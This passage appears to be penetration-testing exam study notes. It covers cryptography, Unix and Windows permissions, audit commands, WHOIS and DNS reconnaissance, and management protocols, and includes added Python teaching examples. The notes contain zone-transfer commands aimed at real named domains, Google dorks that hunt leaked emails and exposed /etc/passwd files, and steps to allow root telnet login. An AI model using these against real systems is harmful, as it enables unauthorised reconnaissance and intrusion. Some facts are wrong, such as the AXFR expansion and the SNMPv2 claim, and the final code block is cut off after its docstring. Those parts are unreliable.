 RSA - An asymmetric cryptographic algorithm. It is based on the fact that finding the factors of an integer is hard (the factoring problem). A user of RSA creates and then publishes the product of two large prime numbers, along with an auxiliary value, as their public key. The prime factors must be kept secret. Anyone can use the public key to encrypt a message, but with currently published methods, if the public key is large enough, only someone with knowledge of the prime factors can feasibly decode the message.
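CBC chaining and error propagation, as an added example (not code from the original notes): it runs CBC over a labelled toy 64-bit block cipher and measures exactly how far a single flipped ciphertext bit reaches on decryption, and what block reordering does. The Feistel stand-in, key, IV and message are all constructed for the demonstration and the cipher is not secure.

```python
"""CBC mode over a labelled toy block cipher, used to watch how an error in the
ciphertext spreads on decryption. Added example for these notes, not the notes'
own code: the Feistel 'cipher' is a stand-in with a 64-bit block (DES-sized) so
the chaining is visible without a crypto library; it is not secure."""
from __future__ import annotations
import hashlib

BLOCK = 8          # 64-bit block, like DES
ROUNDS = 4


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, half: bytes, r: int) -> bytes:
    # Round function of the toy Feistel network: keyed hash truncated to a half block.
    return hashlib.sha256(key + bytes([r]) + half).digest()[:BLOCK // 2]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for r in range(ROUNDS):
        left, right = right, xor(left, _round(key, right, r))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for r in reversed(range(ROUNDS)):
        left, right = xor(right, _round(key, left, r)), left
    return left + right


def pad(data: bytes) -> bytes:
    """PKCS#7: pad to a whole number of blocks (always adds 1..BLOCK bytes)."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """C_i = E_K(P_i XOR C_{i-1}), C_0 = IV: each ciphertext block depends on all earlier plaintext."""
    prev, out = iv, []
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """P_i = D_K(C_i) XOR C_{i-1}: decrypting block i needs only C_i and C_{i-1}."""
    prev, out = iv, []
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(xor(toy_decrypt_block(key, cur), prev))
        prev = cur
    return b"".join(out)


def flip_bit(data: bytes, bit_index: int) -> bytes:
    out = bytearray(data)
    byte, bit = divmod(bit_index, 8)
    out[byte] ^= 1 << bit
    return bytes(out)


def bits_changed_per_block(key: bytes, iv: bytes, plaintext: bytes, bit_index: int) -> list[int]:
    """Flip one ciphertext bit, decrypt, and count differing plaintext bits per block.
    Result: the damaged block is scrambled, the next block has exactly one bit
    flipped, and every block after that decrypts correctly."""
    ct = cbc_encrypt(key, iv, pad(plaintext))
    good = cbc_decrypt(key, iv, ct)
    bad = cbc_decrypt(key, iv, flip_bit(ct, bit_index))
    return [sum(bin(a ^ b).count("1") for a, b in zip(good[i:i + BLOCK], bad[i:i + BLOCK]))
            for i in range(0, len(good), BLOCK)]


def swap_blocks(ciphertext: bytes, i: int, j: int) -> bytes:
    """Reorder two ciphertext blocks; the plaintext they chain into no longer decrypts correctly."""
    blocks = [ciphertext[k:k + BLOCK] for k in range(0, len(ciphertext), BLOCK)]
    blocks[i], blocks[j] = blocks[j], blocks[i]
    return b"".join(blocks)


# Constructed key/IV/message for the demonstration (four blocks after padding).
KEY = b"toy-key-for-demo"
IV = bytes(range(BLOCK))
MESSAGE = b"CBC error propagation: 4 blocks"   # 31 bytes -> 32 with padding

if __name__ == "__main__":
    ct = cbc_encrypt(KEY, IV, pad(MESSAGE))
    print("round trip:", unpad(cbc_decrypt(KEY, IV, ct)) == MESSAGE)
    print("bits changed per block after flipping bit 0 of C_1:",
          bits_changed_per_block(KEY, IV, MESSAGE, BLOCK * 8))
    print("blocks 1 and 2 swapped decrypt to:", cbc_decrypt(KEY, IV, swap_blocks(ct, 1, 2)))
```

Because the damage stays local and predictable, CBC ciphertext should always be paired with a message authentication code such as HMAC before it is trusted.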
 RC4 – (exam tried to confuse with RC5) In cryptography, RC4 (Rivest Cipher 4) is a stream cipher (as contrasted with CBC). While remarkable for its simplicity and speed in software, multiple vulnerabilities have been discovered in RC4, rendering it insecure. RC4 is a symmetric stream cipher that was used widely to encrypt network communications in the 1980s and 1990s. It was originally not widely used because it was maintained as a proprietary trade secret, but the algorithm has since become public knowledge.
 A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream (keystream). In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream.
Hashes: SHA1 and MD5
 SHA-1 (Secure Hash Algorithm 1) is a cryptographic hash function which takes an input and produces a 160-bit (20-byte) hash value known as a message digest, typically rendered as a hexadecimal number, 40 digits long.
 The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional corruption. 32 digits long.
 Like most hash functions, MD5 is neither encryption nor encoding. It can be cracked by brute-force attack and suffers from extensive vulnerabilities.
Message Integrity Codes: HMAC (Hashed Message Authentication Code)
 In cryptography, an HMAC (sometimes expanded as either keyed-hash message authentication code or hash-based message authentication code) is a specific type of message authentication code (MAC) involving a cryptographic hash function and a secret cryptographic key. It may be used to simultaneously verify both the data integrity and the authentication of a message, as with any MAC.
 Any cryptographic hash function, such as MD5 or SHA-1, may be used in the calculation of an HMAC; the resulting MAC algorithm is termed HMAC-X, where X is the hash function used (e.g. HMAC-MD5 or HMAC-SHA1). The cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function, the size of its hash output, and the size and quality of the key.
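HMAC-X built from its definition, as an added example (not code from the original notes): the inner and outer hash steps of RFC 2104 over any hashlib digest, cross-checked against the standard library, with constant-time verification and a tamper check. The key and messages are constructed.

```python
"""HMAC-X built from its definition (RFC 2104) and checked against the standard
library. Added example for these notes, not the notes' own code; the key and
messages below are constructed."""
import hashlib
import hmac


def hmac_x(hash_name: str, key: bytes, message: bytes) -> bytes:
    """HMAC-X = H((K' XOR opad) || H((K' XOR ipad) || message)).

    K' is the key reduced to the hash's block size: hashed down if longer, then
    zero-padded. ipad/opad are the RFC 2104 constants 0x36 and 0x5C. The tag is
    one digest long, so HMAC-MD5 is 16 bytes and HMAC-SHA1 is 20 bytes."""
    block_size = hashlib.new(hash_name).block_size      # 64 for MD5, SHA-1, SHA-256
    if len(key) > block_size:
        key = hashlib.new(hash_name, key).digest()
    key = key.ljust(block_size, b"\x00")
    inner = hashlib.new(hash_name, bytes(k ^ 0x36 for k in key) + message).digest()
    return hashlib.new(hash_name, bytes(k ^ 0x5C for k in key) + inner).digest()


def verify(hash_name: str, key: bytes, message: bytes, tag: bytes) -> bool:
    """Recompute and compare in constant time, so a verifier does not leak how
    many leading tag bytes matched."""
    return hmac.compare_digest(hmac_x(hash_name, key, message), tag)


def matches_stdlib(hash_name: str, key: bytes, message: bytes) -> bool:
    """Cross-check this implementation against hmac.new for the same inputs."""
    return hmac_x(hash_name, key, message) == hmac.new(key, message, hash_name).digest()


def tamper_detected(hash_name: str, key: bytes, message: bytes, altered: bytes) -> bool:
    """A tag computed over `message` must verify for it and fail for any `altered` message."""
    tag = hmac_x(hash_name, key, message)
    return verify(hash_name, key, message, tag) and not verify(hash_name, key, altered, tag)


# Constructed inputs for the demonstration.
KEY = b"constructed-shared-secret"
MSG = b"amount=100&to=alice"
ALTERED = b"amount=999&to=alice"

if __name__ == "__main__":
    for name in ("md5", "sha1", "sha256"):
        tag = hmac_x(name, KEY, MSG)
        print(f"HMAC-{name.upper()}: {tag.hex()} ({len(tag) * 8} bits, "
              f"stdlib match={matches_stdlib(name, KEY, MSG)})")
    print("tampering detected:", tamper_detected("sha256", KEY, MSG, ALTERED))
```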
Perfect forward secrecy (PFS)
 In cryptography, forward secrecy (FS), also known as perfect forward secrecy (PFS), is a feature of specific key agreement protocols that gives assurances that your session keys will not be compromised even if the private key of the server/host is compromised. Forward secrecy protects past sessions against future compromises of secret keys or passwords.
Diffie-Hellman Key Exchange
 Diffie-Hellman is a way of generating a shared secret between two people in such a way that the secret can't be seen by observing the communication. That's an important distinction: you're not sharing information during the key exchange, you're creating a key together.
 This is particularly useful because you can use this technique to create an encryption key with someone, and then start encrypting your traffic with that key. And even if the traffic is recorded and later analysed, there's absolutely no way to figure out what the key was, even though the exchanges that created it may have been visible. This is where perfect forward secrecy comes from. Nobody analysing the traffic at a later date can break in because the key was never saved, never transmitted, and never made visible anywhere.
 Even though it uses the same underlying principles as public key cryptography, this is not asymmetric cryptography because nothing is ever encrypted or decrypted during the exchange. It is, however, an essential building block, and was in fact the base upon which asymmetric crypto was later built.
 Diffie-Hellman is an algorithm used to establish a shared secret between two parties. It is primarily used as a method of exchanging cryptography keys for use in symmetric encryption algorithms like AES.
Elliptic-curve cryptography (ECC)
 A prime number can only be divided by 1 or itself. Prime numbers: 2, 3, 5, 7, 11, 13, and 17.
 Elliptic-curve cryptography (ECC) is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields.
 ECC requires smaller keys compared to non-ECC cryptography (based on plain Galois fields) to provide equivalent security.
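The Diffie-Hellman exchange and the forward-secrecy point above, as an added example (not code from the original notes): both sides' messages, validation of the received public value, derivation of a symmetric session key, discarding of the ephemeral exponents, and what an observer would have to solve. The group p = 23, g = 5 is the constructed textbook toy, chosen only so the numbers are readable.

```python
"""Diffie-Hellman key agreement with both sides' messages, ending in a symmetric
session key, plus the forward-secrecy point that the private exponents are
ephemeral. Added example for these notes, not the notes' own code. The group
(p = 23, g = 5) is a constructed textbook toy; real deployments use
standardised groups of 2048 bits or more."""
from __future__ import annotations
import hashlib
import secrets


def keypair(p: int, g: int, private: int | None = None) -> tuple[int, int]:
    """Pick a private exponent a (or use the one given) and return (a, A = g^a mod p)."""
    while True:
        a = private if private is not None else secrets.randbelow(p - 3) + 2   # 2 .. p-2
        A = pow(g, a, p)
        if 1 < A < p - 1:            # reject degenerate public values 0, 1, p-1
            return a, A
        if private is not None:
            raise ValueError("chosen private exponent gives a degenerate public value")


def shared_secret(p: int, their_public: int, my_private: int) -> int:
    """s = B^a mod p on Alice's side, A^b mod p on Bob's; both equal g^(ab) mod p.
    The received public value is validated before use (degenerate-value check)."""
    if not 1 < their_public < p - 1:
        raise ValueError("invalid public value received")
    return pow(their_public, my_private, p)


def session_key(secret: int, p: int) -> bytes:
    """Derive a fixed-size symmetric key (e.g. for AES-256) from the raw shared secret."""
    length = (p.bit_length() + 7) // 8
    return hashlib.sha256(secret.to_bytes(length, "big")).digest()


def exchange(p: int, g: int, a: int | None = None, b: int | None = None) -> dict:
    """Run the full exchange; return what an observer saw and what each side derived."""
    a, A = keypair(p, g, a)          # Alice
    b, B = keypair(p, g, b)          # Bob
    # Over the wire: only p, g, A and B. Neither a nor b is ever transmitted.
    key_alice = session_key(shared_secret(p, B, a), p)
    key_bob = session_key(shared_secret(p, A, b), p)
    # Forward secrecy: the exponents are discarded once the key exists, so a later
    # compromise of long-term keys cannot reproduce this session's key.
    del a, b
    return {"wire": {"p": p, "g": g, "A": A, "B": B}, "key_alice": key_alice, "key_bob": key_bob}


def eavesdrop_toy(p: int, g: int, A: int, B: int) -> int:
    """What an observer must do to recover the secret: solve g^x = A (discrete log).
    Exhaustive search is only feasible here because the toy p is tiny, which is
    exactly why real groups are 2048 bits or more."""
    for x in range(1, p):
        if pow(g, x, p) == A:
            return pow(B, x, p)
    raise ValueError("no discrete log found")


if __name__ == "__main__":
    result = exchange(23, 5, a=4, b=3)   # textbook values: A = 4, B = 10, secret = 18
    print("wire:", result["wire"])
    print("keys match:", result["key_alice"] == result["key_bob"])
    print("observer recovers toy secret:",
          eavesdrop_toy(23, 5, result["wire"]["A"], result["wire"]["B"]))
```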
 Elliptic curves are applicable for key agreement, digital signatures, pseudo-random generators and other tasks. Indirectly, they can be used for encryption by combining the key agreement with a symmetric encryption scheme.
 The primary benefit promised by elliptic curve cryptography is a smaller key size, reducing storage and transmission requirements, i.e. an elliptic curve group could provide the same level of security afforded by an RSA-based system with a large modulus and correspondingly larger key: for example, a 256-bit elliptic curve public key should provide comparable security to a 3072-bit RSA public key.
B12 - Applications of Cryptography
SSL
 Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide communications security over a computer network. SSL runs on layer 4 (the transport layer) of the OSI model, above TCP/IP and below HTTP.
 The TLS protocol aims primarily to provide privacy and data integrity between two communicating computer applications. A client-server connection will have one or more of the following properties:
 o The connection is private (or secure) because symmetric cryptography is used to encrypt the data transmitted. The keys for this symmetric encryption are generated uniquely for each connection and are based on a shared secret negotiated at the start of the session. The server and client negotiate the details of which encryption algorithm and cryptographic keys to use before the first byte of data is transmitted.
 o The identity of the communicating parties can be authenticated using public-key cryptography (typically the server).
 o The connection ensures integrity because each message transmitted includes a message integrity check using a message authentication code to prevent undetected loss or alteration of the data during transmission.
IPsec
 IPsec is typically used in conjunction with IKE (Internet Key Exchange) for key management.
 IPsec works at layer 3 (the network layer) of the OSI network model to encapsulate normal IP packets. Once a VPN tunnel has been established, any application (web, e-mail, FTP, telnet, even VoIP) can use it without discrimination. IPsec supports multiple encryption algorithms (AES, DES, 3DES, RC4) and multiple integrity mechanisms (MD5, SHA-1), as well as authentication via X.509 certificates.
SSH
 See SSH.
PGP
 PGP uses symmetric and asymmetric keys to encrypt data being transferred across networks. It was developed by the American computer scientist Phil Zimmermann, who made it available for non-commercial use for no charge in 1991. To encrypt data, PGP generates a symmetric key to encrypt the data, which is then protected by the asymmetric key.
Common wireless (802.11) encryption protocols: WEP, WPA, TKIP (see below)
B13 - File System Permissions
File permission attributes within Unix and Windows file systems and their security implications.
UNIX: Owner, Group, Other (Everyone) have r(4) w(2) x(1)
 If the file is owned by the user, the user permissions determine the access.
 If the group of the file is the same as the user's group, the group permission determines the access.
 If the user is not the file owner, and is not in the group, then the other permission is used.
chmod u+rwx test
$ ls -l
drwxr--r-- 1 fred editors 4096 drafts
 In this example, drafts is a directory (denoted by the file descriptor d), and the characters after this indicate the permissions:
 o rwx: the owner (fred) has the right to read (r), write (w) and execute (x)
 o r--: group members (users in the editors group) have read-only permissions; write and execute are not permitted, as denoted by the hyphen characters (-)
 o r--: others (users aside from the owner or members of editors) have read-only permissions; write and execute are not permitted
Windows Permissions
 The system account and the administrator account (Administrators group) have the same file privileges, but they have different functions. The system account is used by the operating system and by services that run under Windows.
 When an object is copied into another directory it inherits the access privileges in place at the destination folder.
 When a file or directory object is moved from one directory to another directory, the NTFS permissions that have been applied to the file move with it.
 The way permissions work is cumulative, with the most restrictive of Share and NTFS giving the actual access. If "Tom", who is in the "Sales", "Finance" and "Staff" groups, has:
Share Permissions: Sales – Read, Staff – Modify, Finance – Read
NTFS Permissions: Sales – Modify, Staff – Modify, Finance – Read
 His effective NTFS permissions are "Modify" as it's the least restrictive when looking at NTFS only, and his cumulative share permissions are "Read" as it's the most restrictive. If we tweak that a little and you have:
Share Permissions: Sales – Read, Staff – Read, Finance – Read
NTFS Permissions: Sales – Modify, Staff – Modify, Finance – Read
 His cumulative NTFS permissions are Modify, but his cumulative share permissions are Read. The exception to this is that the no-access permission overrides all other permissions (both for NTFS and Share).
 For example:
 o Read (NTFS) + no access (NTFS) = no access (NTFS)
 o Read (shared folder) + no access (shared folder) = no access (shared folder)
TrustedInstaller
 TrustedInstaller.exe is the Windows Modules Installer service, which is part of Windows Resource Protection. The TrustedInstaller SID is the 'owner' of most system files and registry entries. If someone with administrative rights attempts to modify or replace a file that is protected by WRP, they will be presented with the message "Access Denied".
Analysing registry ACLs.
B14 - Audit Techniques
Listing processes and their associated network sockets (if any).
 Windows – netstat -nao (aon); -b will list the application
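The two permission models in B13 worked through in code, as an added example (not code from the original notes): the Unix rules (owner, then group, then other) applied to the ls -l line above, and the Windows share + NTFS cumulation with no-access overriding, run on the second "Tom" scenario. All users, groups and ACL entries are constructed.

```python
"""Effective-access calculators for the two models in B13. Added example for
these notes, not the notes' own code: Unix owner/group/other from an ls -l
line, and Windows share + NTFS cumulation with no-access overriding.
All users, groups and ACL entries below are constructed."""
from __future__ import annotations
import re

# ls -l line: type, 9 permission chars, links, owner, group, size, optional date, name.
LS_RE = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+"
    r"(?:[A-Z][a-z]{2}\s+\d{1,2}\s+[\d:]+\s+)?(.+)$")


def parse_ls_line(line: str) -> dict:
    m = LS_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an ls -l line: {line!r}")
    kind, bits, owner, group, name = m.groups()
    perms = {cls: {c for c in bits[i:i + 3] if c != "-"}
             for cls, i in (("owner", 0), ("group", 3), ("other", 6))}
    # Octal form from the r(4) w(2) x(1) weights in the notes.
    octal = "".join(str(4 * ("r" in p) + 2 * ("w" in p) + 1 * ("x" in p))
                    for p in (perms["owner"], perms["group"], perms["other"]))
    return {"name": name, "is_dir": kind == "d", "owner": owner, "group": group,
            "perms": perms, "octal": octal}


def unix_effective(entry: dict, user: str, user_groups: set[str]) -> tuple[str, set[str]]:
    """Exactly one class applies, tested in the order the notes give: owner if the
    user owns the file, else group if the user is in the file's group, else other.
    Order matters: an owner gets the owner bits even when group/other are wider."""
    if user == entry["owner"]:
        cls = "owner"
    elif entry["group"] in user_groups:
        cls = "group"
    else:
        cls = "other"
    return cls, entry["perms"][cls]


# Windows: ordered from least to most permissive; "No Access" is the deny case.
LEVELS = ["Read", "Modify", "Full Control"]


def cumulative(grants: list[str]) -> str | None:
    """Within one layer (share or NTFS), a user's group permissions add up to the
    most permissive one, unless any group is No Access, which overrides the rest."""
    if "No Access" in grants:
        return "No Access"
    return max(grants, key=LEVELS.index) if grants else None


def windows_effective(user_groups: set[str], share_acl: dict, ntfs_acl: dict) -> str:
    """Across layers the more restrictive of share and NTFS wins; no entry in a
    layer, or No Access in either, means no access at all."""
    share = cumulative([share_acl[g] for g in user_groups if g in share_acl])
    ntfs = cumulative([ntfs_acl[g] for g in user_groups if g in ntfs_acl])
    if None in (share, ntfs) or "No Access" in (share, ntfs):
        return "No Access"
    return min(share, ntfs, key=LEVELS.index)


# Constructed inputs modelled on the notes' examples.
LS_LINE = "drwxr--r-- 1 fred editors 4096 drafts"
TOM_GROUPS = {"Sales", "Finance", "Staff"}
SHARE = {"Sales": "Read", "Staff": "Read", "Finance": "Read"}
NTFS = {"Sales": "Modify", "Staff": "Modify", "Finance": "Read"}

if __name__ == "__main__":
    drafts = parse_ls_line(LS_LINE)
    for who, groups in (("fred", {"editors"}), ("alice", {"editors"}), ("bob", {"users"})):
        print(who, unix_effective(drafts, who, groups))
    print("Tom over the share:", windows_effective(TOM_GROUPS, SHARE, NTFS))
```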
 Linux – lsof -i or netstat -lptu
List open ports and the processes that own them. To see which process is bound to, say, port 22 use:
lsof -i :22
Assessing patch levels.
 Linux – uname -a
 Windows PowerShell – Get-HotFix – gets the hotfixes that have been applied to the local and remote computers.
 systeminfo – will list patches as well as other system info
 wmic qfe – (QFE - Quick Fix Engineering) can be run with a number of switches:
 o wmic qfe list
 o wmic qfe list full
 o systeminfo
Finding interesting files.
Linux: find <path> -name <pattern> -type <type>
Find all the files whose name is tecmint.txt in the current working directory.
# find . -name tecmint.txt
./tecmint.txt
Find all the files under the /home directory with name tecmint.txt. Use -iname for case insensitivity.
# find /home -name tecmint.txt
/home/tecmint.txt
Find all php files in a directory.
# find . -type f -name "*.php"
./tecmint.php
./login.php
./index.php
Find .err files in the /home/username/ directory and all sub-directories:
find /home/username/ -name "*.err"
Find all .jpg files in /home and sub-directories:
find /home -name "*.jpg"
-type: specifies file type: f=plain file, d=directory
Appendix C: Background Information Gathering & Open Source

C1 - Registration Records
Information contained within IP and domain registries (WHOIS). Loads of info there...
WHOIS - a protocol for searching internet registration databases (based on RFC 3912) for domain names, IPs, autonomous systems, etc.
whois example.com

C2 - Domain Name Server (DNS)
DNS zone transfers
AXFR - Asynchronous Full Transfer Zone (DNS request)
dig +short example.com
dig @<name-server-of-target> <target-host-or-address> axfr
dig @ns2.iitk.ac.in iitk.ac.in axfr
The command to look up a name server through dig is:
dig <target-host> ns
For finding the name servers of the target in the last example, we can use:
dig iitk.ac.in ns

nslookup
server <DNS Server Name OR IP address of DNS server>
set type=any
ls -d <DNS Zone Name> > dnstest.txt
exit

The host command can be used to get a list of authoritative name servers for a given domain:
host -l ucia.gov

DNS PTR Records
PTR records are written in reverse. A record for network 198.81.129.0 would be queried (with zone transfer) as:
dig @ns-server 129.81.198.in-addr.arpa axfr

Zone file extract (zone file comments start with a semicolon):
; forward zone file for example.com
mail IN A     192.168.0.7
www  IN CNAME mail.example.com.
...
; reverse map zone file for 0.168.192.IN-ADDR.ARPA
; the IP zone is mapped first
...
7 IN PTR mail.example.com. ; the 7 is the last octet of the IP, 192.168.0.7
7 IN PTR www.example.com.
You can also point a specific IP address:
1.0.168.192.in-addr.arpa. IN PTR dns1.example.org.

DNS Version Information
dig @nameserver version.bind chaos txt
Can also be done using nslookup by setting class=chaos
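Added example (not from these notes) for the PTR section: it builds in-addr.arpa names from addresses and octet-aligned networks (the general rule of which 129.81.198.in-addr.arpa is one instance), parses the forward and reverse zone extracts above, and runs the forward-confirmed reverse DNS check that mail filters and log reviewers rely on: every PTR target must resolve back to the address that owns it. The zone text is the extract from the notes; the origins are the ones the extracts name.

```python
"""Reverse-zone naming, PTR parsing and a forward-confirmed reverse DNS check.

Added example (not from the notes). FORWARD_ZONE and REVERSE_ZONE reproduce the
zone extracts above; origins are the ones those extracts name.
"""
import ipaddress
from typing import Dict, Iterator, List, Optional, Tuple

FORWARD_ZONE = """\
; forward zone file for example.com
mail IN A     192.168.0.7
www  IN CNAME mail.example.com.
"""

REVERSE_ZONE = """\
; reverse map zone file for 0.168.192.IN-ADDR.ARPA
7 IN PTR mail.example.com. ; the 7 is the last octet of 192.168.0.7
7 IN PTR www.example.com.
1.0.168.192.in-addr.arpa. IN PTR dns1.example.org.
"""


def reverse_pointer(ip: str) -> str:
    """'192.168.0.7' -> '7.0.168.192.in-addr.arpa' (IPv6 gives ip6.arpa)."""
    return ipaddress.ip_address(ip).reverse_pointer


def reverse_zone_for_network(cidr: str) -> str:
    """Zone name for an octet-aligned IPv4 network: '198.81.129.0/24' -> '129.81.198.in-addr.arpa'."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.version != 4 or net.prefixlen not in (8, 16, 24):
        raise ValueError("only /8, /16 and /24 IPv4 prefixes map to a single in-addr.arpa zone")
    octets = str(net.network_address).split(".")[: net.prefixlen // 8]
    return ".".join(reversed(octets)) + ".in-addr.arpa"


def _records(zone_text: str, origin: str, types: Tuple[str, ...]) -> Iterator[Tuple[str, str, str]]:
    """Yield (owner_fqdn, type, rdata); comments are dropped and relative owners qualified."""
    for raw in zone_text.splitlines():
        parts = raw.split(";", 1)[0].split()
        if len(parts) < 4 or parts[1].upper() != "IN" or parts[2].upper() not in types:
            continue
        owner = parts[0] if parts[0].endswith(".") else f"{parts[0]}.{origin.rstrip('.')}."
        yield owner.lower(), parts[2].upper(), parts[3]


def parse_ptr_records(zone_text: str, origin: str) -> Dict[str, List[str]]:
    """Map dotted IPv4 address -> PTR target names found in the reverse zone."""
    result: Dict[str, List[str]] = {}
    suffix = ".in-addr.arpa."
    for owner, _, target in _records(zone_text, origin, ("PTR",)):
        if owner.endswith(suffix):
            labels = owner[: -len(suffix)].split(".")
            result.setdefault(".".join(reversed(labels)), []).append(target)
    return result


def parse_forward_records(zone_text: str, origin: str) -> Dict[str, Tuple[str, str]]:
    return {owner: (rtype, rdata) for owner, rtype, rdata in _records(zone_text, origin, ("A", "CNAME"))}


def resolve_forward(name: str, forward: Dict[str, Tuple[str, str]], max_hops: int = 8) -> Optional[str]:
    """Follow CNAMEs (bounded, so a loop cannot hang us) until an A record is found."""
    name = name.lower()
    for _ in range(max_hops):
        rec = forward.get(name)
        if rec is None:
            return None
        rtype, rdata = rec
        if rtype == "A":
            return rdata
        name = rdata.lower()
    return None


def fcrdns_mismatches(ptr_map: Dict[str, List[str]],
                      forward: Dict[str, Tuple[str, str]]) -> List[Tuple[str, str]]:
    """(ip, name) pairs where the PTR target does not resolve back to the ip."""
    return [(ip, name) for ip, names in ptr_map.items() for name in names
            if resolve_forward(name, forward) != ip]
```

In the extract the dns1.example.org. PTR has no matching forward record in the example.com zone, so the check reports it; a real run would query the live zones for each PTR target rather than a single file.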
DNS queries and responses
DNS zone transfers. Structure, interpretation and analysis of DNS records: SOA, MX, TXT, A, NS, PTR, HINFO, CNAME.
TXT: A TXT record (short for text record) is a type of resource record in the Domain Name System (DNS) used to associate arbitrary text with a host or other name, such as human-readable information about a server, network, data centre, or other accounting information. The text record can hold an arbitrary unformatted text string. Typically, the record is used by the Sender Policy Framework (SPF) to prevent forged emails from appearing to be sent by you.
HINFO: Host Information - a HINFO record specifies the host/server's type of CPU and operating system. This information can be used by application protocols such as FTP, which use special procedures when communicating with computers of a known CPU and operating system type.
AAAA: IPv6 address record

C3 - Customer Web Site Analysis
Analysis of information from a target web site, both from displayed content and from within the HTML source. Yes, easy one that...

C4 - Google Hacking and Web Enumeration
Google Dorks
- site:paypal.com -www.paypal.com : this removes known domains; keep doing so until all sub-domains are exhausted
- site.com -www -cdn
- site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491
- inurl:slatergordon.com.au $keyword: password, username, sql, filetype:txt
- inurl:/etc/passwd%00 intext:root
- Sometimes the tools will miss pages; try .php?= or inurl:"?id="
- site:https://play.esea.net/ ext:php
- filetype:xlsx site:
- intitle:index of site:
- inurl:etc/passwd site:
- intext:

C5 - NNTP Newsgroups and Mailing Lists

C6 - Information Leakage from Mail & News Headers
Appendix D: Networking Equipment

D1 - Management Protocols
Weaknesses in the protocols commonly used for the remote management of devices:

Telnet
If you need root access via telnet: edit the /etc/pam.d/login and /etc/pam.d/remote files and comment out the line below:
#auth required pam_securetty.so
Also mentioned: edit the file /etc/securetty and add the following to the end of the file:
pts/0

Web based protocols

SSH
See SSH.

SNMP
UDP ports 161 and 162. SNMP depends on secret strings ("community strings") that grant access to portions of devices' management planes. Abuse of SNMP could allow an unauthorised third party to gain access to a network device. SNMPv3 should be the only version of SNMP employed, because SNMPv3 has the ability to authenticate and encrypt payloads. When either SNMPv1 or SNMPv2 is employed, an adversary could sniff network traffic to determine the community string. This compromise could enable a man-in-the-middle or replay attack.

Although SNMPv1 and SNMPv2 have similar characteristics, 64-bit counters were added to SNMPv2 so it could support faster interfaces. SNMPv3 replaces the simple clear-text password sharing used in SNMPv2 with more securely encoded parameters. SNMP version 3 adds both encryption and authentication, which can be used together or separately. Mistakes in the configuration of the read-write mode can make a network susceptible to attacks.
- SNMP v1 sends passwords in clear text over the network.
- SNMP v2 allows password encryption (hashing?) with MD5, but this has to be configured.
- SNMP v3 uses MD5, the Secure Hash Algorithm (SHA) and keyed algorithms to offer protection against unauthorised data modification and masquerade attacks.
The authentication mechanism in SNMPv3 assures that a received message was, in fact, transmitted by the principal whose identifier appears as the source in the message header.
In addition, this mechanism assures that the message was not altered in transit and that it was not artificially delayed or replayed.
TFTP
TFTP is a minimal file transfer protocol that does not provide subcommands to list remote files, and does not require authentication. The basic command syntax is:
tftp [-i] host [GET | PUT] source [destination]
where -i selects binary (image) transfer. UDP port 69. The server is not installed by default on any Windows platform.

Cisco Reverse Telnet
Reverse telnet is used mostly for connecting to the console port of a router, a switch or other device.

NTP
Implementations send and receive timestamps using UDP port 123. They can also use broadcasting or multicasting, where clients passively listen to time updates after an initial round-trip calibrating exchange. NTP is intended to synchronise all participating computers to within a few milliseconds of Coordinated Universal Time (UTC).

NTP uses a hierarchical system of time sources. Each level of this hierarchy is termed a stratum and is assigned a number starting with zero for the reference clock at the top. Stratum 0 devices are high-precision timekeeping devices, also known as reference clocks. Stratum 3 devices are computers synchronised to stratum 2 servers and can act as servers for stratum 4 computers, and so on. The upper limit for stratum is 15; stratum 16 indicates that a device is unsynchronised.

The 64-bit timestamps consist of a 32-bit part for seconds and a 32-bit part for the fractional second. NTP uses an epoch of January 1, 1900. NTPv4 introduces a 128-bit date format: 64 bits for the second and 64 bits for the fractional second. An NTP timestamp is not a human-readable time, and the client does not simply receive a single time value. Synchronising a client to a network server consists of several packet exchanges, where each exchange is a pair of request and reply. When sending out a request, the client stores its own time (originate timestamp) into the packet being sent.
When a server receives such a packet, it will in turn store its own time (receive timestamp) into the packet, and the packet will be returned after a transmit timestamp has been put into it. When receiving the reply, the client once more logs its own receipt time to estimate the travelling time of the packet. The travelling time (delay) is estimated to be half of "the total delay minus remote processing time", assuming symmetrical delays. A server is considered valid only if its replies satisfy the conditions defined in the protocol specification.
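Added example (not from these notes) carrying the exchange above through in code: the 64-bit 1900-epoch timestamp format, a constructed 48-byte NTPv4 server reply built and parsed with struct, and the offset and round-trip delay derived from the four timestamps under the symmetric-delay assumption. The sample times, the reference id and the acceptance thresholds are assumed values; the field layout is the NTP header's.

```python
"""NTP 64-bit timestamps, the 48-byte header and the offset/delay arithmetic.

Added example (not from the notes). The reply packet is CONSTRUCTED with struct;
field order follows the NTP header (LI/VN/Mode, stratum, poll, precision,
root delay, root dispersion, reference id, reference/originate/receive/transmit
timestamps). The four sample times are assumed values.
"""
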